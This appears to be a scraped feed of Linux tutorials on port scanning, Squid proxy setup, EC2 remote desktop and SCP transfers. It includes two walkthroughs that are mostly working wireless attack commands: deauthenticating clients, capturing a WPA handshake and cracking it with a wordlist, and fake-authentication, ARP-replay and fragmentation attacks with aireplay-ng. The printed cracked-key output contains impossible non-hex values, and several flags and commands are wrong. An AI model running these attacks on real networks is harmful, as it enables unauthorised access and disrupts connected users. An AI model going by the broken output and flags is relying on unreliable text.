ubuntu@ubuntu:~$ man nmap

So, to scan your localhost, use the apprehended command below:

ubuntu@ubuntu:~$ sudo nmap localhost

It will list all the open ports on localhost, as displayed in the above image. We can also use nmap to scan remote hosts:

ubuntu@ubuntu:~$ sudo nmap 93.184.216.34

Also, we can use the hostname of the remote server instead of an IP address:

ubuntu@ubuntu:~$ sudo nmap www.example.com

The nmap command can also be used to scan a range of IP addresses. Specify the range of IP Addresses in the command, as in the command below:

ubuntu@ubuntu:~$ sudo nmap 192.168.1.1-10

The above command will scan all the IP addresses from 192.168.1.1 to 192.168.1.10, and it will display the result in the terminal. To scan ports on a subnet, we can use nmap as follows:

ubuntu@ubuntu:~$ sudo nmap 192.168.1.1/24

The above command will scan all the hosts with IP addresses in the subnet defined in the command.

Sometimes you have to scan ports on random hosts, which are in different subnets and are not in sequence, then the best solution is to write a hosts file in which all the hostnames are written, separated by one or more spaces, tabs, or new lines. This file can be used with nmap as follows:

ubuntu@ubuntu:~$ sudo nmap -iL hosts.txt

We can use nmap to scan a single port on the system by specifying the port using the ‘-p’ flag, along with nmap, as in the following command:

ubuntu@ubuntu:~$ sudo nmap -p 80 localhost

Range of ports can also be scanned on a system using nmap in the following way:

ubuntu@ubuntu:~$ sudo nmap -p 80-85 localhost

We can scan all the ports of a system using nmap:

ubuntu@ubuntu:~$ sudo nmap -p- localhost

To get a list of the most commonly open ports on your system, you can use the nmap command with the ‘-F’ flag:

ubuntu@ubuntu:~$ sudo nmap -F localhost

TCP ports can be scanned on the system using nmap by just adding the ‘-T’ flag, along with the nmap command:

ubuntu@ubuntu:~$ sudo nmap -sT localhost

Similarly, for UDP ports, you can use the ‘-U’ flag with the nmap command:

ubuntu@ubuntu:~$ sudo nmap -sU localhost

List Open Ports Using lsof

The lsof command, also known as ‘list open files’, is used to get the information about open files used by different processes in UNIX and LINUX like operating systems. For most of the Linux distros, this tool comes pre-installed. We can verify the installation of lsof by just checking its version:

ubuntu@ubuntu:~$ lsof -v

If it does not show the version, then lsof is not installed by default. We can still install it using the following commands in the terminal:

ubuntu@ubuntu:~$ sudo apt-get update -y
ubuntu@ubuntu:~$ sudo apt-get install lsof

We can use the lsof command along with different options. The list of all the available options can be displayed using the following command in the terminal:

ubuntu@ubuntu:~$ man lsof

Now, in this section, we are going to use lsof to display ports of a system in different ways:

ubuntu@ubuntu:~$ sudo lsof -i

The above command has displayed all the open ports. We can also use the lsof command to display all the open sockets:

ubuntu@ubuntu:~$ sudo lsof -n -P | grep LISTEN

We can list filtered ports based on a protocol using lsof. Run the command given below to list all the TCP Connection types:

ubuntu@ubuntu:~$ sudo lsof -i tcp

Similarly, we can list all the UDP connection types using lsof in the following way:

ubuntu@ubuntu:~$ sudo lsof -i udp

List Open Ports Using netstat

The netstat, also known as network statistics, is a command line program used to display detailed information about networks. It displays both incoming and outgoing TCP connections, routing tables, network interfaces, etc. In this section, we will use netstat to list open ports on a system. The netstat tool can be installed by running the following commands:

ubuntu@ubuntu:~$ sudo apt-get update -y
ubuntu@ubuntu:~$ sudo apt-get install net-tools -y

After running the above commands, you can verify the installation by checking the netstat version:

ubuntu@ubuntu:~$ netstat --version

If it displays the version of net-tools, then the installation is fine, otherwise, run the installation commands again. To get an overview of all the available options that can be used, along with the netstat command, run the following command:

ubuntu@ubuntu:~$ man netstat

We can get a list of all the listening ports using the netstat command in Ubuntu by running the following command:

ubuntu@ubuntu:~$ sudo netstat -l

The netstat command can also be used to filter listening to the TCP and UDP ports by just adding a flag along with the command. For listening to the TCP ports:

ubuntu@ubuntu:~$ sudo netstat -lt

For listening to the UDP ports, use the following command:

ubuntu@ubuntu:~$ sudo netstat -lu

To get the list of all the listening UNIX ports, you can run the following command in the terminal:

ubuntu@ubuntu:~$ sudo netstat -lx

List Open Ports Using ss

The ss command is used to display information about sockets in a Linux system. It displays more detailed information about sockets than the netstat command. The ss command comes pre-installed for most of the Linux distros, so you do not need to install it before using it. You can get a list of all the options, which can be used along with the ss command, by running the ‘man’ command with ss:

ubuntu@ubuntu:~$ man ss

To get a list of all the connection regardless of their state, use the ss command without any flag:

ubuntu@ubuntu:~$ sudo ss

To get a list of all the listening ports, use the ss command with the ‘-l’ flag. The ‘-l’ flag is used to display only listening ports:

ubuntu@ubuntu:~$ sudo ss -l

To get all the listening TCP ports, we can use the ‘-t’ and ‘-l’ flag along with the ss command:

ubuntu@ubuntu:~$ sudo ss -lt

Similarly, we can get a list of all the listening UDP ports using the ss command along with the ‘-u’ and ‘-l’ flag:

ubuntu@ubuntu:~$ sudo ss -lu

The ss command can also be used to get a list of all the connections with the source or the destination port. In the following example, we are going to get the list of all the connections with the destination or source port 22:

ubuntu@ubuntu:~$ sudo ss -at( dport = :22 or sport = :22 )

You will get a list of all the inbound and outgoing connections if you have connected to a remote system using ssh.

Conclusion

For system administrators, security professionals, and other IT related persons, it is important to be aware of the open ports on the servers. Linux is rich with the tools used to diagnose networks and provides many tools that can be helpful for various kinds of networking activities. In this tutorial, we have used some tools like netstat, ss, lsof, and nmap to check for open ports on Ubuntu. After going through this article, you will be able to easily list all the listening ports on your Linux server in many ways.

]]>
How to Use Aircrack-ng https://linuxhint.com/how_to_aircrack_ng/ Mon, 14 Dec 2020 02:28:17 +0000 https://linuxhint.com/?p=79899 Most of the time, people never think about the network to which they are connected. They never think how secure that network is and how much they risk their confidential data on a daily basis. You can run vulnerability checks on your wifi networks by using a very powerful tool called Aircrack-ng and Wireshark. Wireshark is used to monitor network activity. Aircrack-ng is more like an aggressive tool that lets you hack and give access to Wireless connections. Thinking as an intruder has always been the safest way to protect yourself against a hack. You might be able to grasp the exact actions that an intruder will take to obtain access to your system by learning about aircrack. You can then conduct compliance checks on your own system to ensure that it is not insecure.

Aircrack-ng is a full set of software designed to test WiFi network security. It is not just a single tool but a collection of tools, each of which performs a particular purpose. Different areas of wifi security can be worked on, like monitoring the Access Point, testing, attacking the network, cracking the wifi network, and testing it. Aircrack’s key objective is to intercept the packets and decipher the hashes to break the passwords. It supports nearly all the new wireless interfaces. Aircrack-ng is an improved version of an outdated tool suite Aircrack, ng refers to the New Generation. Some of the awesome tools that work together in taking out a bigger task.

Airmon-ng:

Airmon-ng is included in the aircrack-ng kit that places the network interface card in the monitor mode. Network cards will usually only accept packets targeted for them as defined by the NIC’s MAC address, but with airmon-ng, all wireless packets, whether they are targeted for them or not, will be accepted too. You should be able to catch these packets without linking or authenticating with the access point. It is used to check the status of an Access Point by putting the network interface in monitor mode. Firstly one has to configure the wireless cards to turn on the monitor mode, then kill all the background processes if you think that any process is interfering with it. After terminating the processes, monitor mode can be enabled on the wireless interface by running the command below:

ubuntu@ubuntu:~$ sudo airmon-ng start wlan0 #<network interface name>

You can also disable the monitor mode by stopping the airmon-ng anytime by using the command below:

ubuntu@ubuntu:~$ sudo airmon-ng stop wlan0 #<network interface name>

Airodump-ng:

Airodump-ng is used to list all the networks surrounding us and to view valuable information about them. The basic functionality of airodump-ng is to sniff packets, so it’s essentially programmed to grab all the packets around us while being put in the monitor mode. We will run it against all connections around us and gather data like the number of clients connected to the network, their corresponding mac addresses, encryption style, and channel names and then start targeting our target network.

By typing the airodump-ng command and giving it the network interface name as the parameter, we can activate this tool. It will list all the access points, the amount of data packets, encryption and authentication methods used, and the name of the network (ESSID). From a hacking point of view, the mac addresses are the most important fields.

ubuntu@ubuntu:~$ sudo airodump-ng wlx0mon

Aircrack-ng:

Aircrack is used for password cracking. After capturing all the packets using airodump, we can crack the key by aircrack. It cracks these keys using two methods PTW and FMS. PTW approach is done in two phases. At first, only the ARP packets are being used, and only then, if the key is not cracked after the searching, it uses all the other captured packets. A plus point of the PTW approach is that not all the packets are used for the cracking. In the second approach, i.e., FMS, we use both the statistical models and the brute force algos for cracking the key. A dictionary method can also be used.

Aireplay-ng:

Airplay-ng introduces packets to a wireless network to create or accelerate traffic. Packets from two different sources can be captured by aireplay-ng. The first is the live network, and the second one is the packets from the already existed pcap file. Airplay-ng is useful during a deauthentication attack that targets a wireless access point and a user. Moreover, you can perform some attacks like coffee latte attack with airplay-ng, a tool that allows you to get a key from the client’s system.  You can achieve this by catching an ARP packet and then manipulating it and sending it back to the system. The client will then create a packet that can be captured by airodump and aircrack cracks the key from that modified packet. Some other attack options of airplay-ng include chopchop, fragment arepreplay, etc.

Airbase-ng:

Airbase-ng is used to transform an intruder’s computer to a compromised connection point for others to link to. Using Airbase-ng, you can claim to be a legal access point and conduct man-in-the-middle attacks on computers that are attached to your network. These kinds of attacks are called Evil Twin Attacks. It is impossible for basic users to discern between a legal access point and a fake access point. So, the evil twin threat is among the most threatening wireless threats we face today.

Airolib-ng:

Airolib speeds up the hacking process by storing and managing the password lists and the access point. The database management system used by this program is SQLite3, which is mostly available on all platforms. Password cracking includes the computation of the pairwise master key through which the private transient key (PTK) is extracted. Using the PTK, you can determine the frame message identification code (MIC) for a given packet and theoretically find the MIC to be similar to the packet, so if the PTK was right, the PMK was right as well.

To see the password lists and access networks stored in the database, type the following command:

ubuntu@ubuntu:~$ sudo airolib-ng testdatabase –stats

Here testdatabase is the db which you want to access or create, and –stats is the operation you want to perform on it. You can do multiple operations on the database fields, like giving maximum priority to some SSID or something. To use airolib-ng with aircrack-ng, enter the following command:

ubuntu@ubuntu:~$ sudo aircrack-ng  -r testdatabase wpa2.eapol.cap

Here we are using the already computed PMK’s stored in the testdatabase for speeding-up the password cracking process.

Cracking WPA/WPA2 using Aircrack-ng:

Let’s look at a small example of what aircrack-ng can do with the help of a few of its awesome tools.  We will crack a WPA/WPA2 network’s pre-shared key using a dictionary method.

The first thing we need to do is to list out network interfaces that support monitor mode. This can be done using the following command:

ubuntu@ubuntu:~$ sudo airmon-ng

PHY    Interface                  Driver         Chipset

Phy0   wlx0                       rtl8xxxu       Realtek Semiconductor Corp.

We can see an interface; now, we have to put the network interface we have found ( wlx0 ) in monitor mode using the following command:

ubuntu@ubuntu:~$ sudo airmon-ng start wlx0

It has enabled monitor mode on the interface called wlx0mon.

Now we should start listening to broadcasts by nearby routers through our network interface we have put in monitor mode.

ubuntu@ubuntu:~$ sudo airodump-ng wlx0mon

CH  5 ][ Elapsed: 30 s ][ 2020-12-02 00:17

 

BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 

E4:6F:13:04:CE:31  -45       62       27    0   1  54e  WPA2 CCMP   PSK  CrackIt

C4:E9:84:76:10:BE  -63       77        0    0   6  54e. WPA2 CCMP   PSK  HAckme

C8:3A:35:A0:4E:01  -63       84        0    0   8  54e  WPA2 CCMP   PSK  Net07

74:DA:88:FA:38:02  -68       28        2    0  11  54e  WPA2 CCMP   PSK  TP-Link_3802

 

BSSID              STATION            PWR   Rate    Lost    Frames  Probe

 

E4:6F:13:04:CE:31  5C:3A:45:D7:EA:8B   -3    0 - 1e     8        5

E4:6F:13:04:CE:31  D4:67:D3:C2:CD:D7  -33    1e- 6e     0        3

E4:6F:13:04:CE:31  5C:C3:07:56:61:EF  -35    0 - 1      0        6

E4:6F:13:04:CE:31  BC:91:B5:F8:7E:D5  -39    0e- 1   1002       13 

Our target network is Crackit in this case, which is currently running on channel 1.

Here in order to crack the password of the target network, we need to capture a 4-way handshake, which happens when a device tries to connect to a network. We can capture it by using the following command:

ubuntu@ubuntu:~$ sudo airodump-ng -c 1 --bssid  E4:6F:13:04:CE:31 -w /home wlx0

-c         : Channel

–bssid: Bssid of the target network

-w        : The name of the directory where the pcap file will be placed

Now we have to wait for a device to connect to the network, but there is a better way to capture a handshake. We can deauthenticate the devices to the AP using a deauthentication attack using the following command:

ubuntu@ubuntu:~$ sudo aireplay-ng -0 -a E4:6F:13:04:CE:31

a:    Bssid of the target network

-0:   deauthentication attack

We have disconnected all the devices, and now we have to wait for a device to connect to the network.

CH  1 ][ Elapsed: 30 s ][ 2020-12-02 00:02 ][ WPA handshake: E4:6F:13:04:CE:31

 

BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH E

 

E4:6F:13:04:CE:31  -47   1      228      807   36   1  54e  WPA2 CCMP   PSK  P

 

BSSID              STATION            PWR   Rate    Lost    Frames  Probe

 

E4:6F:13:04:CE:31  BC:91:B5:F8:7E:D5  -35    0 - 1      0        1

E4:6F:13:04:CE:31  5C:3A:45:D7:EA:8B  -29    0e- 1e     0       22

E4:6F:13:04:CE:31  88:28:B3:30:27:7E  -31    0e- 1      0       32

E4:6F:13:04:CE:31  D4:67:D3:C2:CD:D7  -35    0e- 6e   263      708  CrackIt

E4:6F:13:04:CE:31  D4:6A:6A:99:ED:E3  -35    0e- 0e     0       86

E4:6F:13:04:CE:31  5C:C3:07:56:61:EF  -37    0 - 1e     0        1            

We got a hit, and by looking at the top right corner right next to the time, we can see a handshake has been captured. Now look in the folder specified ( /home in our case ) for a “.pcap” file.

In order to crack the WPA key, we can use the following command:

ubuntu@ubuntu:~$ sudo aircrack-ng -a2 -w rockyou.txt -b  E4:6F:13:04:CE:31 handshake.cap

b                          :Bssid of the target network

-a2                      :WPA2 mode

Rockyou.txt:       The dictionary file used

Handshake.cap: The file which contains captured handshake

Aircrack-ng 1.2 beta3

[00:01:49] 10566 keys tested (1017.96 k/s)

KEY FOUND! [ yougotme ]

Master Key :   8D EC 0C EA D2 BC 6B H7 J8 K1 A0 89 6B 7B 6D

0C 06 08 ED BC 6B H7 J8 K1 A0 89 6B 7B B F7 6F 50 C


Transient Key : 4D C4 5R 6T 76 99 6G 7H 8D EC

H7 J8 K1 A0 89 6B 7B 6D AF 5B 8D 2D A0 89 6B

A5 BD K1 A0 89 6B 0C 08 0C 06 08 ED BC 6B H7 J8 K1 A0 89

8D EC 0C EA D2 BC 6B H7 J8 K1 A0 89 6B

MAC:  CB 5A F8 CE 62 B2 1B F7 6F 50 C0 25 62 E9 5D 71

The key to our target network has been cracked successfully.

Conclusion:

Wireless networks are everywhere, used by each and every company, from workers using smartphones to industrial control devices. According to research, almost over 50 percent of the internet traffic will be over WiFi in 2021.  Wireless networks have many advantages, communication outside doors, quick internet access in places where it is almost impossible to lay wires, can expand the network without installing cables for any other user, and can easily connect your mobile devices to your home offices while you aren’t there.

Despite these advantages, there is a big question mark about your privacy and security. As these networks; within the transmitting range of routers are open to everyone, they can easily be attacked, and your data can easily be compromised. For example, if you are connected to some public wifi, anyone connected to that network can easily check your network traffic using some intelligence and with the help of awesome tools available and even dump it.

]]>
How to Install and Setup Squid Proxy Server on Your Linux Server? https://linuxhint.com/install-and-setup-squid-proxy-server-on-linux-server/ Sun, 13 Dec 2020 21:08:02 +0000 https://linuxhint.com/?p=81286

Squid proxy is a web proxy application that can be installed and set up on Linux and other Unix-like operating systems. It is used to increase web browsing speed by caching the website’s data, controlling web traffic, security, and DNS lookups. The squid proxy server acts as an intermediate between the client (web browsers, etc.) and the internet. It is compatible with web protocols HTTP and HTTPS, as well as other protocols like FTP, WAIS, etc.

How to Install Squid Proxy?

To install squid proxy on Linux, first, update the system packages by executing the following command:

ubuntu@ubuntu:~$ sudo  apt  update

Once you have updated your system, you can install squid proxy by typing this command:

ubuntu@ubuntu:~$ sudo apt -y install squid

Squid proxy will be installed. To start and see the status of Squid proxy, execute these commands:

ubuntu@ubuntu:~$ sudo service squid start
ubuntu@ubuntu:~$ sudo service squid status

Configuration for Your Web Browser

Before you make any changes to the squid configuration file, you have to change some settings in your web browser. So, open your web browser and open “network settings”, then proceed to “proxy settings”. Click on the “manual proxy” configuration, then write the IP_Address of your squid proxy server in the HTTP proxy bar and port no (by default, squid proxy port is 3128). Now, the squid proxy will go through your IP_Address. You can check it by typing any URL in your web browser; it will give you an error saying access denied, and to allow the access, we have to make changes in the squid configuration file.

Squid Proxy Configuration

You can access the squid configuration file in the directory “etc/squid/squid.conf”.

ubuntu@ubuntu:~$ cd  etc/squid/squid.conf

Make a copy of the “squid.conf” file as a backup file if we want to make changes to the “squid.conf” file.

ubuntu@ubuntu:~$ cp  etc/squid/squid.conf   etc/squid/backup.conf

Now that a copy has been made as a backup file, we can make changes in the “squid.conf” file.

To open “squid.conf” file in vim, type this command:

ubuntu@ubuntu:~$ sudo vim /etc/squid/squid.conf

Go to the line http_access deny all.

Change it to:

http_access allow all

Now, check your web browser again, type any URL, and it should be working.

ACL (Access Control List)

There is another case used in squid proxy that allows you to also control the access to different websites (web traffic) by either allowing or blocking them. To do so, go to the line “acl CONNECT method CONNECT”.

And below this line, write the ACL (access control list) to block the websites you want.

acl block_websites dstdomain .facebook.com .youtube.com .etc.com

Then deny the statement.

http_access deny block_websites

Save the changes, and to check whether your blocked websites are blocked or not, restart your squid service and verify the URL in your web browser.

ubuntu@ubuntu:~$ sudo service squid restart

You can also block a user from downloading specific files like audio and video files using ACL.

acl  media_files  urlpath_regex -i  \.(mp3|mp4|FLV|AVI|MKV)

It will prevent the user from downloading audio or video files with extensions like mp3, mp4, FLV, etc. Add any file extension you want to prevent from downloading. Now, below this line, write the deny statement.

http_access deny media_files

The media files will then be blocked from downloading.

Caching Web Pages

Proxy servers are also used for boosting the network performance by loading the web page faster by caching the website’s data. You can also change the directory location where cached data should be stored. Moreover, you can also change the cache file size and no. of directories in which data would be saved.

To make changes, open “squid.conf” file and go to the following line:

#chache_dir ufs /opt/squid/var/cache/squid 100 16 256

This line will be commented by default, so uncomment this line by removing the # sign.

In the above line, there is a phrase “100 16 256”. The 100 shows the size of the cache file, and you may change it to any size like 300. 16 shows the number of directories in which the cache file is saved. 256 shows the no. of subdirectories.

chache_dir ufs /opt/squid/var/cache/squid 300 20 260

You can also change the size of the cache file by adding the following line in the “squid.conf” file:

cache_mem 300 MB

If you want to change the path of the cache file directory, type the following command:

ubuntu@ubuntu:~$ sudo mkdir -p /path/where/you/want/to/place/file

To change the ownership of the cache directory to squid proxy, you have to execute this command:

ubuntu@ubuntu:~$ sudo chown -R proxy:proxy /path/where/you/want /to/place/file

Now, stop the squid service using this command:

ubuntu@ubuntu:~$ sudo service squid stop

And then run the command with this command:

ubuntu@ubuntu:~$ sudo squid -z

It will make the missing cache directories in the new cache directory.

Now, start the squid service again using the command below:

ubuntu@ubuntu:~$ sudo service squid start

Conclusion

We have discussed how to install and configure Squid proxy. It is very simple and easy to use and has vast applications. Squid proxy is a very good tool that can be used in organizations or by small internet service providers to control web traffic and internet access. It boosts web browsing speed and provides security mechanisms for web traffic.

]]>
Aireplay-ng https://linuxhint.com/aireplay_ng/ Tue, 08 Dec 2020 01:19:53 +0000 https://linuxhint.com/?p=79915

Aireplay-ng is used to generate rogue Wireless traffic. It can be used along with aircrack-ng to crack WEP and WPA keys. The main purpose of aireplay-ng is to inject frames. There are several different types of powerful attacks that can be performed using aireplay-ng, such as the deauthentication attack, which helps in capturing WPA handshake data, or the fake authentication attack, in which packets are injected into the network access point by authenticating to it to create and capture new IVs. Other types of attacks are included in the following list:

  • Interactive packet replay attack
  • ARP request replay attack
  • KoreK chopchop attack
  • Cafe-latte attack
  • Fragmentation attack

Usage of aireplay-ng

Injection Test

Certain network cards do not support packet injection, and aireplay-ng only works with network cards that support this feature. The first thing to do before performing an attack is to check whether your network card supports injection. You can do this simply by running an injection test using the following command:

ubuntu@ubuntu:~$ sudo aireplay-ng -9 wlan0


-9        : Injection test (–test can also be used)

Wlan0: Network interface name

Here, you can see that we have found 1 AP (Access point), named PTCL-BB, the interface that is used, the ping time, and the channel it is running on. So, we can clearly determine by looking at the output that injection is working, and we are good to perform other attacks.

Deauthentication Attack

The deauthentication attack is used to send deauthentication packets to one or more clients who are connected to a given AP to deauthenticate the client(s). Deauthentication attacks can be performed for many different reasons, such as capturing WPA/WPA2 handshakes by forcing the victim to reauthenticate, recovering a hidden ESSID (hidden Wi-Fi name), generating ARP packets, etc. The following command is used to perform a deauthentication attack:

ubuntu@ubuntu:~$ sudo aireplay-ng -0 1 -a E4:6F:13:04:CE:31 -c cc:79:cf:d6:ac:fc wlan0

-0 : Deauthentication attack

1 : Number of deauthentication packets to send

-a : MAC address of AP (Wireless Router)

-c : MAC address of victim (if not specified, it will deauthenticate all the clients connected to the given AP)

wlan0 : Network interface name

As you can see, we have successfully deauthenticated the system with the given MAC address that was connected just a moment before. This deauthentication attack will force the specified client to disconnect and then reconnect again to capture the WPA handshake. This WPA handshake can be cracked by Aircrack-ng later on.

If you do not specify the ‘-c’ option in the above command, aireplay-ng will force every device on that Wireless router (AP) to disconnect by sending fake deauthentication packets.

Fake Authentication Attack (WEP)

Suppose that you need to inject packets into an AP (Wireless Router), but you do not have your client device associated or authenticated with it (this only works in the case of WEP security protocol). APs contain a list of all connected clients and devices and they ignore any other packet coming from any other source. It will not even bother to see what is inside the packet. To tackle this issue, you will authenticate your system to the given router or AP through a method called fake authentication. You can perform this action using the following commands:

ubuntu@ubuntu:~$ sudo aireplay-ng -1 0 -a E4:6F:13:04:CE:31 -h cc:70:cf:d8:ad:fc wlan0

-1 : Fake authentication attack (–fakeauth can also be used)

-a : Access Point MAC address

-h : MAC address of the device to which to perform fake authentication

wlan0 : Network interface name

In the above output, you will see that the authentication request was successful and the network has now become an open network for us. As you can see, the device is not connected to the given AP, but rather, authenticated to it. That means that packets can now be injected into the specified AP, as we are now authenticated, and it will receive any request we will send.

ARP Request Replay Attack (WEP)

The best and most reliable way to produce new initialization vectors is the ARP request replay attack. This type of attack waits and listens for an ARP packet and, on obtaining the packet, transmits the package back. It will continue to retransmit ARP packets back again and again. In each case, a new IV will be generated, which later helps in cracking or determining the WEP key. The following commands will be used to perform this attack:

ubuntu@ubuntu:~$ sudo aireplay-ng -3 -b E4:6F:13:04:CE:31 -h cc:70:cf:d8:ad:fc wlan0

-3 : Arp request replay attack (–arpreplay can also be used)

-b : MAC address of AP

-h : MAC address of the device to which the fake authentication is to be sent

wlan0 : Network interface name

Now, we will wait for an ARP packet from the Wireless AP. Then, we will capture the packet and re-inject it into the interface specified.

This produces an ARP packet and that must be injected back, which can be done using the following command:

ubuntu@ubuntu:~$ sudo aireplay-ng -2 -r arp-0717-135835.cap wlan0

-2 : Interactive frame selection

-r : Name of file from last successful packet replay

Wlan0:  Network interface name

Here, airodump-ng will be started to capture the IVs, first putting the interface in monitor mode; meanwhile, the data should start increasing rapidly.

Fragmentation Attack (WEP)

A fragmentation attack is used to get 1500 bytes of P-R-G-A, rather than a WEP key. These 1500 bytes are later used by packetforge-ng to perform various injection attacks. A minimum of one packet obtained from the AP is required to obtain these 1500 bytes (and sometimes less). The following commands are used to perform this type of attack:

ubuntu@ubuntu:~$ sudo aireplay-ng -5 -b E4:6F:13:04:CE:31 -h cc:70:cf:d8:ad:fc wlan0

-5 : Fragmentation attack

-b : MAC address of AP

-h : MAC address of the device from which packets will be injected

wlan0 : Network interface name


After capturing the packet, it will ask whether to use this packet to obtain the 1500 bytes of PRGA. Press Y to continue.

Now we the 1500 bytes of PRGA have successfully been obtained. These bytes are stored in a file.

Conclusion

Aireplay-ng is a useful tool that helps in cracking WPA/WPA2-PSK and WEP keys by performing various powerful attacks on wireless networks. In this way, aireplay-ng generates important traffic data to be used later on. Aireplay-ng also comes with aircrack-ng, a very powerful software suite consisting of a detector, a sniffer, and WPA and WEP/WPS cracking and analysis tools.

]]>
How to Configure GUI on your EC2 Instance https://linuxhint.com/configure_gui_ec2_ubuntu/ Mon, 30 Nov 2020 15:46:22 +0000 https://linuxhint.com/?p=78743

There are two different types of interfaces to interact with an operating system that is a Graphical User Interface (GUI) and Command Line Interface (CLI). In the Command Line Interface, we interact with the system directly using system commands on the terminal. We give commands to the system, then the system executes operating system functions according to the given commands, and we receive responses from the system in the form of simple text. The command-line interface is not commonly used by beginners. It is mostly used by developers and system administrators to configure systems and install packages as using Command Line Interface is much faster than using Graphical User Interface. Also, tasks can be automated by writing simple scripts (bash script for Linux and batch scripts for windows) using a command-line interface. We can perform way more functions using the command line interface.

For GUI, we have a  nice representation of files and folders in the operating system using icons and indicators. It is much easier for non-professionals to use a graphical user interface instead of a command-line interface.

When you start an Ubuntu EC2 Instance on the cloud, by default, you only have a Command Line Interface to interact with the server. For the System Administrators, it is much easier to configure the machine remotely using Command Line Interface, but for the developers who are new to Command Line Interface, it can get more difficult for them to manage everything using the command-line interface. So they can enable GUI to use the remote servers easily. Now in this article, we are going to see how we can enable Graphical User Interface on our EC2 instance.

Getting Started

The first step to get started is to have SSH access to the instance. Connect to the instance over SSH using the following command

ubuntu@ubuntu:~$ ssh ubuntu@<IP Address> -i <Key Pair>

Where <IP Address> is the public IP of the instance and <Key Pair> is the Key Pair to connect to the instance. For the Ubuntu EC2 instance, the default user will be ubuntu but if you have changed the username, then use that username instead of ‘ubuntu’ in the above command.

NOTE: Sometimes you see an ‘UNPROTECTED PRIVATE KEY FILE’ error while connecting to the instance; then use the following command before connecting to the instance

ubuntu@ubuntu:~$ sudo chmod 400 <Key Pair>

The above error occurs when your private key file has loose permissions. The above command restricts the private key file to be read-only by the current user.

Installing LXDE

Lightweight X11 Desktop Environment (LXDE) is an open-source software program used to provide a desktop environment to the Unix-like Operating systems. To enable GUI on the Ubuntu EC2 instance, we will use LXDE. LXDE is preferred over other desktop environments like GNOME as it is lightweight and uses fewer system resources than others. Update the system before installing this package

ubuntu@ip-172-31-39-44:~$ sudo apt-get update -y

Install LXDE using the following command

ubuntu@ip-172-31-39-44:~$ sudo apt-get install lxde -y

During installation, it will ask for the display manager configuration. Press the‘ Tab’ key to highlight the ‘OK’ and then hit enter.

Now it will ask for selecting either ‘lightdm’ or ‘gdm3’. The ‘lightdm’ and ‘gdm3’ are display managers, and you have to select one of them. Select ‘lightdm’ as it is ranked 2nd among all the display managers, and ‘gdm3’ is ranked 7th. Use the ‘Tab’, ‘DOWN’ and ‘UP’ arrow keys to switch the options in the list


After this, the installation will complete, and we will move to the next step.

Installing XRDP

After installing LXDE, we will now install the XRDP package on our ubuntu instance. XRDP is also an open-source package used to provide a desktop view to the ubuntu server as we can not have a GUI using SSH. It is actually a package to enable remote desktop protocol on Linux machines. Normally Linux servers do not come with a pre-installed desktop environment. The following command will install the XRDP package to your Ubuntu instance

ubuntu@ip-172-31-39-44:~$ sudo apt-get install xrdp -y

Now we can establish a connection between our local system and remote server using the remote desktop protocol.

Set Up Password for User

In order to connect to the remote Ubuntu instance over the remote desktop connection, we should set up a password for the user. By default, we connect with our instance over SSH using the default user ‘ubuntu’ using SSH key pairs. But to connect using the remote desktop protocol, we have to set up a password for the user. The following command will set up a password for the ‘ubuntu’ user.

ubuntu@ip-172-31-39-44:~$ sudo passwd ubuntu

Configure Security Group

The remote desktop protocol works on port 3389, so we have to open that port in the security group of our instance to connect using the remote desktop protocol. In order to connect to our instance over SSH, we open port 22 of the instance that is the default SSH port. Without opening the 3389 port, we can not connect to our instance using the Graphical User Interface.

Connect to the Instance

Now our ubuntu instance is ready for the connection using a remote desktop protocol. We can use either Linux or Windows to connect to our instance using RDP. On Ubuntu, type

ubuntu@ubuntu:~$ rdesktop [IP_Address]

While on Windows, search ‘Remote Desktop Connection’ client in the windows search bar and open it. It will ask for the DNS or IP address and username.


Use the IP address and username of the Ubuntu instance. You can also save the connection setting to an RDP file to use for later connection. Also, you can use the previously saved settings for this connection to connect to the instance. Now click on ‘connect,’ and it will ask for the password for this user.


Use the password we have already set up, and it will connect with your instance with Graphical User Interface.

Conclusion

Handling remote servers using the Command-line interface can be a difficult task for beginners. So, in order to manage remote servers easily, we can configure the ubuntu server to use the remote desktop protocol to get a nice graphical user interface. In this tutorial, we have enabled a graphical user interface on the Ubuntu instance to facilitate novice Linux users.

]]>
Multiple Ways to Transfer Files Between Your Computer and Cloud Linux Server https://linuxhint.com/linux-server-file-transfer/ Sat, 28 Nov 2020 19:54:54 +0000 https://linuxhint.com/?p=78458 There are multiple methods you can use to transfer files between your machine and Linux server, some of which we’ll discuss in this article.

  • using the SCP command in SSH
  • using Netcat
  • using FTP
  • using Python’s Simple HTTP Server

Using SCP (SSH)

SCP is a utility used to move files and directories securely via SSH. With the SCP command, you can transfer files from your computer to your Linux server and vice versa. As this utility uses SSH to move files, you’ll need the SSH credential of your server to transfer files.

SSH comes pre-installed on most Linux servers, but if not, you can install and enable it using the following steps.

Open the Ubuntu terminal and type.

$ sudo apt install -y openssh-server
$ sudo service ssh start

Upload files via SCP

Scp command follows this pattern

$ scp [Options] [Source] [Destination]

To transfer a file from your computer to a linux server, write these commands

$scp /path/of/your/local/file.ext usrename@linux-server-IP:/path/of/ file.ext -i key.pem

In the above command, first, you have to give the path of the file you want to copy from your computer to the Linux server, then the username and IP address of the Linux server, and the path where you want to copy the file on the Linux server fallowing this pattern (username@remote-server-IP: path/of/remote/file.ext).

After running this command, it will require the password of the Linux server user account

$ username@remote-server’s password :

After entering the password, the file will be uploaded.

Download files via SCP

To download files from the Linux server to your computer, you need to provide SCP with the local path of the file or directory and the path on the Linux Server where you’d want your file to be uploaded.

$ scp username@linux-server-ip:/path/of/file.ext  /path/to/destination

After running this command, it will require the authentication password of the linux server. Once you have entered the password, then the file will be copied safely to your computer.

SCP Command-Line Options

You can use different flags(known as command-line options) in the SCP command.

-p flag is used to change the port. By default, ssh uses the 22 port, but with the -p flag, we can change port 22 to something else, like 2222.

$ scp -p 2222 path/of/your/local/file.ext username@linux-server-ip: path/of/file.ext

-r flag is used to copy the folder and all of its content.

$ scp -r /path/of/your/local/folder username@linux-server-ip: /path/of/folder

-i flag is used to authenticating the connection using a cryptographic key pair stored in a file instead of a username and password.

$ scp -i path/of/your/local/file.ext username@linux-server-ip: path/of/file.ext

-c flag is used to compress the data that you want to transfer.

$ scp -c path/of/your/local/file.ext username@linux-server-ip: path/of/file.ext

-q flag is used to suppress the non-error message and progress meter.

$ scp -q /path/of/your/local/file.ext username@linux-server-ip: /path/of/file.ext

Transfer Files Using Netcat

